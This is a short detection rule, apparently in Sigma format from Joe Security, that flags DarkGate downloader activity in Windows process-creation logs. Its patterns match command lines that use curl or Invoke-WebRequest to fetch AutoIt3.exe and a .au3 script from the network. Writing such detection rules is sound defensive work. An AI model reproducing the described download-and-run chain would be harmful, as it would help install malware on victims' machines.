DarkGate

 1title: DarkGate
 2status: experimental
 3description: DarkGate Downloader 
 4author: Joe Security
 5date: 2023-09-21
 6id: 200112
 7threatname:
 8behaviorgroup: 20
 9classification: 4
10mitreattack: 
11
12logsource:
13    category: process_creation
14    product: windows
15detection:
16    selection:
17        CommandLine:
18            - '*copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe*'
19            - '*curl -o autoit3.exe http* & curl -o *.au3 http*'
20            - "*Invoke-WebRequest -Uri *-OutFile 'AutoIt3.exe' *Invoke-WebRequest -Uri *-OutFile '*.au3'*"
21            
22    condition: selection
23level: critical